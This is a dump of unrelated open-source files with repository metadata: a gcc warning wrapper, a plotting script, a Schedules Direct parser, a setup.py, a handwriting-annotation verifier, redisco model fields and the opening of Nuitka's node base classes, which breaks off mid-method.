self.wikipedia_id = kwargs.get('wikipedia_id', None)
self.wikipedia_url = None
self.bing_id = kwargs.get('bing_id', None)
self.type = kwargs.get('type', None)
self.sub_type = kwargs.get('sub_type', None)
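# A minimal construction sketch (values are illustrative; in practice
# instances are deserialized from Text Analytics responses, and
# wikipedia_url is read-only/server-populated):
# record = EntityRecord(name='Seattle', type='Location', wikipedia_language='en')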
|
mit
| 6,033,418,252,891,552,000
| 39.134328
| 78
| 0.612495
| false
| 4.043609
| false
| false
| false
|
poondog/kangaroo-m7-mkv
|
scripts/gcc-wrapper.py
|
1
|
3884
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2011-2012, Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Code Aurora nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NON-INFRINGEMENT ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Invoke gcc, looking for warnings, and causing a failure if there are
# non-whitelisted warnings.
import errno
import re
import os
import sys
import subprocess
# Note that gcc uses unicode, which may depend on the locale. TODO:
# force LANG to be set to en_US.UTF-8 to get consistent warnings.
allowed_warnings = set([
"return_address.c:62",
"swab.h:49",
"SemaLambda.cpp:946",
"CGObjCGNU.cpp:1414",
"BugReporter.h:146",
"RegionStore.cpp:1904",
"SymbolManager.cpp:484",
"RewriteObjCFoundationAPI.cpp:737",
"RewriteObjCFoundationAPI.cpp:696",
"CommentParser.cpp:394",
"CommentParser.cpp:391",
"CommentParser.cpp:356",
"LegalizeDAG.cpp:3646",
"IRBuilder.h:844",
"DataLayout.cpp:193",
"transport.c:653",
"xt_socket.c:307",
"xt_socket.c:161",
"inet_hashtables.h:356",
"xc4000.c:1049",
"xc4000.c:1063",
])
# Capture the name of the object file, can find it.
ofile = None
warning_re = re.compile(r'''(.*/|)([^/]+\.[a-z]+:\d+):(\d+:)? warning:''')
def interpret_warning(line):
"""Decode the message from gcc. The messages we care about have a filename, and a warning"""
line = line.rstrip('\n')
m = warning_re.match(line)
if m and m.group(2) not in allowed_warnings:
print "error, forbidden warning:", m.group(2)
# If there is a warning, remove any object if it exists.
if ofile:
try:
os.remove(ofile)
except OSError:
pass
sys.exit(1)
def run_gcc():
args = sys.argv[1:]
# Look for -o
try:
i = args.index('-o')
global ofile
ofile = args[i+1]
except (ValueError, IndexError):
pass
compiler = sys.argv[0]
try:
proc = subprocess.Popen(args, stderr=subprocess.PIPE)
for line in proc.stderr:
print line,
interpret_warning(line)
result = proc.wait()
except OSError as e:
result = e.errno
if result == errno.ENOENT:
print args[0] + ':',e.strerror
print 'Is your PATH set correctly?'
else:
print ' '.join(args), str(e)
return result
if __name__ == '__main__':
status = run_gcc()
sys.exit(status)
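# Example invocation (hypothetical compiler and file names; the first
# argument is the real compiler, everything after it is passed through):
#   scripts/gcc-wrapper.py arm-eabi-gcc -c fs/open.c -o fs/open.o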
|
gpl-2.0
| 3,073,904,154,896,566,300
| 32.482759
| 97
| 0.664779
| false
| 3.770874
| false
| false
| false
|
cemagg/sucem-fem
|
sandbox/flux_calc/plotty.py
|
1
|
1219
|
from __future__ import division
import pylab
import numpy as np
import run_data
reload(run_data)
def get_unit_gradients(resdict, ind=0, op=lambda x: x):
return dict((k, np.gradient(op(v[ind])))
for k,v in resdict.iteritems())
def get_gradients(resdict, op1=lambda x: x, op2=lambda x: x):
return dict((k, np.gradient(op1(v[1])) / np.gradient(op2(v[0])))
for k,v in resdict.iteritems())
def logify(resdict, op=lambda x: x):
return dict((k, np.log(op(v))) for k,v in resdict.iteritems())
vflux_gradients_unity = get_unit_gradients(run_data.vflux, ind=1,
op=lambda x: np.real(x))
vflux_gradients = get_gradients(run_data.vflux, op1=np.real)
vflux_log = logify(vflux_gradients, op=np.abs)
vflux_log_h = logify(run_data.vflux, op=lambda x: x[0])
pylab.figure(1)
pylab.hold(0)
pylab.plot(-vflux_log_h['1r'], vflux_log['1r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['1'], vflux_log['1'], label='forward')
pylab.legend(loc=0)
pylab.figure(2)
pylab.hold(0)
pylab.plot(-vflux_log_h['2r'], vflux_log['2r'], label='reversed')
pylab.hold(1)
pylab.plot(-vflux_log_h['2'], vflux_log['2'], label='forward')
pylab.legend(loc=0)
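# Interpretation note (an assumption based on the variable names above): each
# figure plots log|d(flux)/d(h)| against -log(h), so the slope of a straight
# segment estimates the convergence order of the forward vs. reversed flux
# calculations.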
|
gpl-3.0
| 247,746,161,481,558,900
| 32.861111
| 68
| 0.647252
| false
| 2.661572
| false
| false
| false
|
astrilchuk/sd2xmltv
|
libschedulesdirect/common/servicecountry.py
|
1
|
1174
|
import logging
class ServiceCountry(object):
def __init__(self):
self.full_name = None # type: unicode
self.short_name = None # type: unicode
self.postal_code_example = None # type: unicode
self.postal_code_regex = None # type: unicode
self.one_postal_code = False # type: bool
@classmethod
def from_dict(cls, dct): # type: (dict) -> ServiceCountry
"""
:param dct:
:return:
"""
service_country = cls()
if "fullName" in dct:
service_country.full_name = dct.pop("fullName")
if "shortName" in dct:
service_country.short_name = dct.pop("shortName")
if "postalCodeExample" in dct:
service_country.postal_code_example = dct.pop("postalCodeExample")
if "postalCode" in dct:
service_country.postal_code_regex = dct.pop("postalCode")
if "onePostalCode" in dct:
            service_country.one_postal_code = dct.pop("onePostalCode")
if len(dct) != 0:
            logging.warning("Key(s) not processed for ServiceCountry: %s", ", ".join(dct.keys()))
return service_country
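# A minimal usage sketch (field values are illustrative, shaped like a
# Schedules Direct countries entry):
if __name__ == "__main__":
    sc = ServiceCountry.from_dict({
        "fullName": "United States",
        "shortName": "USA",
        "postalCodeExample": "60030",
        "postalCode": "/\\d{5}/",
        "onePostalCode": False})
    print("%s (%s), e.g. %s" % (sc.full_name, sc.short_name, sc.postal_code_example))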
|
mit
| 825,535,162,735,604,700
| 26.302326
| 94
| 0.580068
| false
| 3.811688
| false
| false
| false
|
glomex/gcdt-lookups
|
setup.py
|
1
|
1606
|
from setuptools import setup, find_packages
from codecs import open
import os
here = os.path.abspath(os.path.dirname(__file__))
# Get the long description from the README file
try:
import pypandoc
long_description = pypandoc.convert('README.md', format='md', to='rst')
except(IOError, ImportError):
with open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# get the dependencies and installs
with open(os.path.join(here, 'requirements.txt'), encoding='utf-8') as f:
all_reqs = f.read().split('\n')
install_requires = [x.strip() for x in all_reqs if ('git+' not in x) and
(not x.startswith('#')) and (not x.startswith('-'))]
dependency_links = [x.strip().replace('git+', '') for x in all_reqs if 'git+' in x]  # keep only the VCS requirements
setup(
name='gcdt-lookups',
version='0.0.26',
description='Plugin (gcdt-lookups) for gcdt',
long_description=long_description,
license='MIT',
classifiers=[
'Natural Language :: English',
'Intended Audience :: Developers',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
],
keywords='',
packages=find_packages(exclude=['docs', 'tests*']),
include_package_data=True,
author='glomex SRE Team',
install_requires=install_requires,
dependency_links=dependency_links,
author_email='mark.fink@glomex.com',
entry_points={
'gcdt10': [
'lookups=gcdt_lookups.lookups',
],
}
)
|
mit
| -4,124,764,179,536,673,000
| 31.12
| 87
| 0.627024
| false
| 3.600897
| false
| false
| false
|
bdzimmer/handwriting
|
handwriting/verify.py
|
1
|
13242
|
# -*- coding: utf-8 -*-
"""
Interactively verify predictions from algorithms so they can be used as ground
truth for evaluation or training.
"""
# Copyright (c) 2017 Ben Zimmer. All rights reserved.
# New process that uses mutable tree of Samples.
import os
import sys
import cv2
import numpy as np
from handwriting import analysisimage, annotate, driver
from handwriting import findletters, charclass, improc, util
from handwriting.prediction import Sample
def int_safe(obj, default=0):
"""safely convert something to an integer"""
try:
obj_int = int(obj)
except ValueError:
obj_int = default
return obj_int
def _image_idx(x_val, widths, hgap):
"""find the index of an image given a position, image widths, and a
horizontal gap size"""
widths = [x + hgap for x in widths]
widths_cumsum = np.cumsum([0] + widths)
return np.where(x_val >= widths_cumsum)[0][-1]
def _mutate_set_verify_recursive(sample, verified):
"""recursively set a hierarchy of samples as verified or unverified"""
sample.verified = verified
if isinstance(sample.result, Sample):
_mutate_set_verify_recursive(sample.result, verified)
elif isinstance(sample.result, list):
for samp in sample.result:
_mutate_set_verify_recursive(samp, verified)
def _verification_status_recursive(sample, verified=0, total=0):
"""recursively determine how much of the sample has been verified"""
total = total + 1
if sample.verified:
verified = verified + 1
if isinstance(sample.result, Sample):
verified, total = _verification_status_recursive(
sample.result, verified, total)
elif isinstance(sample.result, list):
for samp in sample.result:
verified, total = _verification_status_recursive(
samp, verified, total)
return verified, total
def _mutate_recalculate_list(
list_update, new_items, compare_func, calc_func):
"""update samples in a list, recalculating items that have changed"""
# list_update is a list of Samples
# new_items are not samples; calc_func will take one of these and return
# a Sample
res = []
for item in new_items:
found = False
for old_item in list_update:
if compare_func(item, old_item.data):
print(old_item.data)
# y.verified = True
res.append(old_item)
found = True
break
if not found:
print("recalculating", item)
sample = calc_func(item)
# sample.verified = True
res.append(sample)
print("done updating list")
list_update[:] = res
def _mutate_verify_line_poss(image_sample, process_line_position):
"""verify positions of lines"""
print("Verify the positions of the lines.")
print("left mouse button: create a new line with two clicks")
print("right mouse button: delete the nearest line")
print("escape: done")
print()
lines = [x.data for x in image_sample.result]
lines_verified = annotate.annotate_lines(image_sample.data, lines)
# update what's been modified in the hierarchy
calc_func = lambda x: process_line_position(x, image_sample.data)
_mutate_recalculate_list(
image_sample.result, lines_verified, np.allclose, calc_func)
image_sample.verified = True
for samp in image_sample.result: # verify line position samples
samp.verified = True
def _mutate_verify_multi(
line_image_sample,
process_word_position,
process_char_position,
new_char_annotation_mode):
"""open different annotation options depending on click location
in line analysis image"""
window_title = "line analysis"
def draw():
"""refresh the view"""
lai = analysisimage.LineAnalysisImage(line_image_sample)
cv2.imshow(window_title, lai.image)
def on_mouse(event, mouse_x, mouse_y, flags, params):
"""helper"""
if event == cv2.EVENT_LBUTTONDOWN:
print(mouse_x, mouse_y, "left")
lai = analysisimage.LineAnalysisImage(line_image_sample)
if mouse_y >= lai.line_y_start and mouse_y < lai.line_y_end:
print("line")
print("Verify the positions of the words.")
print("left mouse button: create a new word with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
word_positions = [x.data for x in line_image_sample.result]
words_verified = annotate.annotate_word_positions(
line_image_sample.data, word_positions)
calc_func = lambda x: process_word_position(x, line_image_sample.data)
_mutate_recalculate_list(
line_image_sample.result, words_verified, np.allclose, calc_func)
line_image_sample.verified = True
for samp in line_image_sample.result: # verify word position samples
samp.verified = True
draw()
elif mouse_y >= lai.words_y_start and mouse_y < lai.words_y_end:
print("words")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_words_im_x,
[word_pos.data[1] - word_pos.data[0] for word_pos in word_positions],
analysisimage.HGAP_LARGE)
# TODO: work with word image sample instead
word_position_sample = word_positions[idx]
char_positions = [x.data for x in word_position_sample.result.result]
print("char positions:", char_positions)
if new_char_annotation_mode:
print("Verify the positions of the characters.")
print("left mouse button: create a new character with two clicks")
print("right mouse button: delete the nearest word")
print("escape: done")
print()
char_positions_verified = annotate.annotate_word_positions(
word_position_sample.result.data,
char_positions)
else:
print("Verify the positions of gaps between letters.")
print("left mouse button: create a new gap")
print("right mouse button: delete the nearest gap")
print("escape: done")
print()
char_gaps = findletters.positions_to_gaps(char_positions)
char_gaps_verified = annotate.annotate_letter_gaps(
word_position_sample.result.data,
char_gaps)
char_positions_verified = findletters.gaps_to_positions(char_gaps_verified)
print("char positions verified:", char_positions_verified)
calc_func = lambda x: process_char_position(x, word_position_sample.result.data)
_mutate_recalculate_list(
word_position_sample.result.result, char_positions_verified,
np.allclose, calc_func)
word_position_sample.result.verified = True # verify word image sample
for samp in word_position_sample.result.result: # verify char position samples
samp.verified = True
draw()
elif lai.char_ims_y_start <= mouse_y < lai.char_ims_y_end:
# verify character labels by word
print("char ims")
# which word are we modifying?
word_positions = line_image_sample.result
idx = _image_idx(
mouse_x - lai.all_char_ims_im_x,
[np.sum([char_pos.data[1] - char_pos.data[0] + analysisimage.HGAP_SMALL
for char_pos in word_pos.result.result]) - analysisimage.HGAP_SMALL
for word_pos in word_positions],
analysisimage.HGAP_LARGE)
patch_width = 96
patch_height = 96
pad = lambda x: improc.pad_image(x, patch_width, patch_height)
# TODO: most of this logic is to deal with the charclass interface
def pad_preds(preds):
"""helper"""
return [p.copy(data=(pad(p.data), None, p.data)) for p in preds]
def unpad_preds(preds):
"""helper"""
return [p.copy(data=(p.data[2], p.data[1])) for p in preds]
while idx < len(word_positions):
char_img_samples = [char_pos.result
for char_pos in word_positions[idx].result.result]
chars_working, chars_done = charclass.label_chars(pad_preds(char_img_samples))
# this is a bit of a hack, but it works well for now.
print(len(chars_working), len(chars_done))
if len(chars_done) == 0:
break
char_img_samples_verified = unpad_preds(chars_working) + unpad_preds(chars_done)
for org_sample, new_sample in zip(char_img_samples, char_img_samples_verified):
org_sample.result = new_sample.result
org_sample.verified = new_sample.verified
draw()
idx = idx + 1
elif lai.chars_y_start <= mouse_y < lai.chars_y_end:
print("chars")
cv2.waitKey(1)
if event == cv2.EVENT_RBUTTONDOWN:
print(mouse_x, mouse_y, "right")
cv2.waitKey(1)
cv2.namedWindow(window_title, cv2.WINDOW_NORMAL)
cv2.setMouseCallback(window_title, on_mouse, 0)
draw()
while True:
key = cv2.waitKey(0)
if key == 27:
break
if key == 13:
_mutate_set_verify_recursive(line_image_sample, True)
if key == 8:
_mutate_set_verify_recursive(line_image_sample, False)
draw()
cv2.destroyWindow(window_title)
def main(argv):
"""main program"""
if len(argv) < 3:
print("Usage: verify input_file <line | multi | view>")
sys.exit()
input_filename = argv[1]
verify_type = argv[2]
new_char_annotation_mode = False
# filename has a number version suffix
sample_filename = input_filename + ".sample.pkl"
sample_dirname, sample_basename = os.path.split(sample_filename)
possible_files = [x for x in os.listdir(sample_dirname)
if x.startswith(sample_basename)]
versions = [int_safe(x.split(".")[-1]) for x in possible_files]
latest_idx = np.argmax(versions)
latest_version = versions[latest_idx]
latest_filename = possible_files[latest_idx]
sample_filename_full = os.path.join(sample_dirname, latest_filename)
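# e.g. with "scan.png.sample.pkl.1" and "scan.png.sample.pkl.2" on disk,
# the ".2" file is loaded (filenames illustrative)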
print("loading sample file:", sample_filename_full)
image_sample = util.load(sample_filename_full)
# with open(sample_filename_full, "rb") as sample_file:
# image_sample = pickle.load(sample_file)
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
(process_image,
process_line_position,
process_word_position,
process_char_position) = driver.current_best_process()
if verify_type == "line":
_mutate_verify_line_poss(image_sample, process_line_position)
elif verify_type == "view":
for line_pos in image_sample.result:
img = analysisimage.LineAnalysisImage(line_pos.result).image
cv2.namedWindow("line analysis", cv2.WINDOW_NORMAL)
cv2.imshow("line analysis", img)
cv2.waitKey()
else:
if len(argv) > 3:
start_idx = int(argv[3]) - 1
else:
start_idx = 0
for idx in range(start_idx, len(image_sample.result)):
line_pos = image_sample.result[idx]
print("editing line " + str(idx + 1) + " / " + str(len(image_sample.result)))
_mutate_verify_multi(
line_pos.result,
process_word_position, process_char_position,
new_char_annotation_mode)
if verify_type != "view":
status = _verification_status_recursive(image_sample)
print(
status[0], "/", status[1], "samples verified", "-",
np.round(status[0] / status[1] * 100, 2), "%")
sample_filename_full = sample_filename + "." + str(latest_version + 1)
print("writing sample file:", sample_filename_full)
util.save(image_sample, sample_filename_full)
# with open(sample_filename_full, "wb") as sample_file:
# pickle.dump(image_sample, sample_file)
if __name__ == "__main__":
main(sys.argv)
|
bsd-3-clause
| 6,504,261,244,183,423,000
| 37.606414
| 100
| 0.576801
| false
| 4.040891
| true
| false
| false
|
heckj/redisco
|
redisco/models/attributes.py
|
1
|
15052
|
# -*- coding: utf-8 -*-
"""
Defines the fields that can be added to redisco models.
"""
import sys
from datetime import datetime, date
from dateutil.tz import tzutc, tzlocal
from calendar import timegm
from redisco.containers import List
from exceptions import FieldValidationError, MissingID
__all__ = ['Attribute', 'CharField', 'ListField', 'DateTimeField',
'DateField', 'ReferenceField', 'Collection', 'IntegerField',
'FloatField', 'BooleanField', 'Counter']
class Attribute(object):
"""Defines an attribute of the model.
The attribute accepts strings and are stored in Redis as
they are - strings.
Options
name -- alternate name of the attribute. This will be used
as the key to use when interacting with Redis.
indexed -- Index this attribute. Unindexed attributes cannot
be used in queries. Default: True.
unique -- validates the uniqueness of the value of the
attribute.
validator -- a callable that can validate the value of the
attribute.
default -- Initial value of the attribute.
"""
def __init__(self,
name=None,
indexed=True,
required=False,
validator=None,
unique=False,
default=None):
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default
self.unique = unique
self.zindexable = False
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if callable(self.default):
default = self.default()
else:
default = self.default
self.__set__(instance, default)
return default
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def typecast_for_read(self, value):
"""Typecasts the value for reading from Redis."""
# The redis client encodes all unicode data to utf-8 by default.
return value.decode('utf-8')
def typecast_for_storage(self, value):
"""Typecasts the value for storing to Redis."""
try:
return unicode(value)
except UnicodeError:
return value.decode('utf-8')
def value_type(self):
return unicode
def acceptable_types(self):
return basestring
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
# type_validation
if val is not None and not isinstance(val, self.acceptable_types()):
errors.append((self.name, 'bad type',))
# standard validation first
if self.required:
if val is None or not unicode(val).strip():
errors.append((self.name, 'required'))
# validate uniqueness
if val and self.unique:
error = self.validate_uniqueness(instance, val)
if error:
errors.append(error)
# validate using validator
if self.validator:
r = self.validator(self.name, val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
def validate_uniqueness(self, instance, val):
encoded = self.typecast_for_storage(val)
matches = instance.__class__.objects.filter(**{self.name: encoded})
if len(matches) > 0:
try:
instance_id = instance.id
no_id = False
except MissingID:
no_id = True
if (len(matches) != 1) or no_id or (
matches.first().id != instance.id):
return (self.name, 'not unique',)
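# Hedged usage sketch (editor's addition, not original documentation): how
# these options combine on a model. "Person" is illustrative; the models
# import reflects redisco's usual public API.
def _example_attribute_options():
    from redisco import models
    class Person(models.Model):
        name = models.Attribute(required=True, unique=True)
        nickname = models.Attribute(indexed=False, default=u'')
    return Person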
class CharField(Attribute):
def __init__(self, max_length=255, **kwargs):
super(CharField, self).__init__(**kwargs)
self.max_length = max_length
def validate(self, instance):
errors = []
super(CharField, self).validate(instance)
val = getattr(instance, self.name)
if val and len(val) > self.max_length:
errors.append((self.name, 'exceeds max length'))
if errors:
raise FieldValidationError(errors)
class BooleanField(Attribute):
def typecast_for_read(self, value):
return bool(int(value))
def typecast_for_storage(self, value):
if value is None:
return "0"
return "1" if value else "0"
def value_type(self):
return bool
def acceptable_types(self):
return self.value_type()
class IntegerField(Attribute):
def __init__(self, **kwargs):
super(IntegerField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return int(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return unicode(value)
def value_type(self):
return int
def acceptable_types(self):
return (int, long)
class FloatField(Attribute):
def __init__(self, **kwargs):
super(FloatField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return float(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return "%f" % value
def value_type(self):
return float
def acceptable_types(self):
return self.value_type()
class DateTimeField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateTimeField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
# We load the stored value as a UTC timestamp
dt = datetime.fromtimestamp(float(value), tzutc())
# and attach (ie: not convert to) the UTC timezone
return dt
except (TypeError, ValueError):
return None
def typecast_for_storage(self, value):
if value is None:
return None
if not isinstance(value, datetime):
raise TypeError("%s should be datetime object, and not a %s" %
(self.name, type(value)))
# Are we timezone aware? If not, assume the local timezone.
if value.tzinfo is None:
value = value.replace(tzinfo=tzlocal())
return "%d.%06d" % (float(timegm(value.utctimetuple())),
value.microsecond)
def value_type(self):
return datetime
def acceptable_types(self):
return self.value_type()
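# Hedged sketch (editor's addition): round-tripping a value through the
# storage format above -- a "seconds.microseconds" UTC epoch string.
def _example_datetime_roundtrip():
    field = DateTimeField(name='created_at')
    aware = datetime(2012, 1, 1, 12, 0, 0, tzinfo=tzutc())
    stored = field.typecast_for_storage(aware)  # "1325419200.000000"
    return field.typecast_for_read(stored)      # datetime back, in UTC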
class DateField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
dt = date.fromordinal(int(value))
return dt
except (TypeError, ValueError):
return None
def typecast_for_storage(self, value):
if value is None:
return None
if not isinstance(value, date):
raise TypeError("%s should be date object, and not a %s" %
(self.name, type(value)))
return "%d" % value.toordinal()
def value_type(self):
return date
def acceptable_types(self):
return self.value_type()
class ListField(object):
"""Stores a list of objects.
target_type -- can be a Python object or a redisco model class.
If target_type is not a redisco model class, it should also be a
callable that casts the (string) value of a list element into
target_type, e.g. str, unicode, int, float.
ListField also accepts a string that refers to a redisco model.
"""
def __init__(self, target_type,
name=None,
indexed=True,
required=False,
validator=None,
default=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default or []
from base import Model
self._redisco_model = (isinstance(target_type, basestring) or
issubclass(target_type, Model))
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if instance.is_new():
val = self.default
else:
key = instance.key(att=self.name)
val = List(key).members
if val is not None:
klass = self.value_type()
if self._redisco_model:
val = filter(lambda o: o is not None,
[klass.objects.get_by_id(v) for v in val])
else:
val = [klass(v) for v in val]
self.__set__(instance, val)
return val
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def value_type(self):
if isinstance(self._target_type, basestring):
t = self._target_type
from base import get_model_from_key
self._target_type = get_model_from_key(self._target_type)
if self._target_type is None:
raise ValueError("Unknown Redisco class %s" % t)
return self._target_type
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, list):
errors.append((self.name, 'bad type'))
else:
for item in val:
if not isinstance(item, self.value_type()):
errors.append((self.name, 'bad type in list'))
# standard validation first
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
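# Hedged sketch (editor's addition): target_type as a plain callable. Each
# element read back from Redis is cast through it, so builtins work directly.
def _example_list_field():
    scores = ListField(int, name='scores')
    assert scores.value_type() is int
    return scores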
class Collection(object):
"""
A simple container that will be replaced by the good imports
and the good filter query.
"""
def __init__(self, target_type):
self.target_type = target_type
def __get__(self, instance, owner):
if not isinstance(self.target_type, str):
raise TypeError("A collection only accepts a string "
"representing the Class")
# __import__ should be something like
# __import__('mymod.mysubmod', fromlist=['MyClass'])
klass_path = self.target_type.split(".")
fromlist = klass_path[-1]
frompath = ".".join(klass_path[0:-1])
# if the path is not empty, it is worth importing the class;
# otherwise it's a local class that has already been imported.
if frompath:
mod = __import__(frompath, fromlist=[fromlist])
else:
mod = sys.modules[__name__]
klass = getattr(mod, fromlist)
return klass.objects.filter(
**{instance.__class__.__name__.lower() + '_id': instance.id})
def __set__(self, instance, value):
"""
Prevent the attribute from being overridden
"""
raise AttributeError("can't override a collection of object")
class ReferenceField(object):
def __init__(self,
target_type,
name=None,
attname=None,
indexed=True,
required=False,
related_name=None,
default=None,
validator=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self._attname = attname
self._related_name = related_name
self.validator = validator
self.default = default
def __set__(self, instance, value):
"""
Set the referenced object; passing None simply
removes the reference.
"""
if not isinstance(value, self.value_type()) and \
value is not None:
raise TypeError
# remove the cached value from the instance
if hasattr(instance, '_' + self.name):
delattr(instance, '_' + self.name)
# Remove the attribute_id reference
setattr(instance, self.attname, None)
# Set it to the new value if any.
if value is not None:
setattr(instance, self.attname, value.id)
def __get__(self, instance, owner):
try:
if not hasattr(instance, '_' + self.name):
o = self.value_type().objects.get_by_id(
getattr(instance, self.attname))
setattr(instance, '_' + self.name, o)
return getattr(instance, '_' + self.name)
except AttributeError:
setattr(instance, '_' + self.name, self.default)
return self.default
def value_type(self):
return self._target_type
@property
def attname(self):
if self._attname is None:
self._attname = self.name + '_id'
return self._attname
@property
def related_name(self):
return self._related_name
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, self.value_type()):
errors.append((self.name, 'bad type for reference'))
# standard validation first
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
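# Hedged sketch (editor's addition): the id attribute name is derived from
# the field name unless attname is passed explicitly.
def _example_reference_attname():
    ref = ReferenceField(object, name='owner')
    assert ref.attname == 'owner_id'
    return ref.attname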
class Counter(IntegerField):
def __init__(self, **kwargs):
super(Counter, self).__init__(**kwargs)
if 'default' not in kwargs or self.default is None:
self.default = 0
self.zindexable = True
def __set__(self, instance, value):
raise AttributeError("can't set a counter.")
def __get__(self, instance, owner):
if not instance.is_new():
v = instance.db.hget(instance.key(), self.name)
if v is None:
return 0
return int(v)
else:
return 0
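# Editor's note (hedged): counters are meant to be changed through atomic
# Redis operations on the backing hash elsewhere in the library (presumably
# an HINCRBY-style call); this descriptor is read-only, hence __set__ raises.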
|
mit
| -8,004,247,094,733,032,000
| 30.48954
| 76
| 0.554411
| false
| 4.450621
| false
| false
| false
|
kayhayen/Nuitka
|
nuitka/nodes/NodeBases.py
|
1
|
35111
|
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Node base classes.
These classes provide the generic base classes available for nodes,
statements or expressions alike. There is a dedicated module for
expression only stuff.
"""
from abc import abstractmethod
from nuitka import Options, Tracing, TreeXML, Variables
from nuitka.__past__ import iterItems
from nuitka.Errors import NuitkaNodeDesignError, NuitkaNodeError
from nuitka.PythonVersions import python_version
from nuitka.SourceCodeReferences import SourceCodeReference
from nuitka.utils.InstanceCounters import (
counted_del,
counted_init,
isCountingInstances,
)
from .FutureSpecs import fromFlags
from .NodeMakingHelpers import makeStatementOnlyNodesFromExpressions
from .NodeMetaClasses import NodeCheckMetaClass, NodeMetaClassBase
class NodeBase(NodeMetaClassBase):
__slots__ = "parent", "source_ref"
# Avoid the attribute unless it's really necessary.
if Options.is_fullcompat:
__slots__ += ("effective_source_ref",)
# String to identify the node class, to be consistent with its name.
kind = None
@counted_init
def __init__(self, source_ref):
# The base class has no __init__ worth calling.
# Check source reference to meet basic standards, so we note errors
# when they occur.
assert source_ref is not None
assert source_ref.line is not None
self.parent = None
self.source_ref = source_ref
if isCountingInstances():
__del__ = counted_del()
@abstractmethod
def finalize(self):
pass
def __repr__(self):
return "<Node %s>" % (self.getDescription())
def getDescription(self):
"""Description of the node, intended for use in __repr__ and
graphical display.
"""
details = self.getDetailsForDisplay()
if details:
return "'%s' with %s" % (self.kind, details)
else:
return "'%s'" % self.kind
def getDetails(self):
"""Details of the node, intended for re-creation.
We are not using the pickle mechanisms, but this is basically
part of what the constructor call needs. Real children will
also be added.
"""
# Virtual method, pylint: disable=no-self-use
return {}
def getDetailsForDisplay(self):
"""Details of the node, intended for use in __repr__ and dumps.
This is also used for XML.
"""
return self.getDetails()
def getCloneArgs(self):
return self.getDetails()
def makeClone(self):
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **self.getCloneArgs())
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
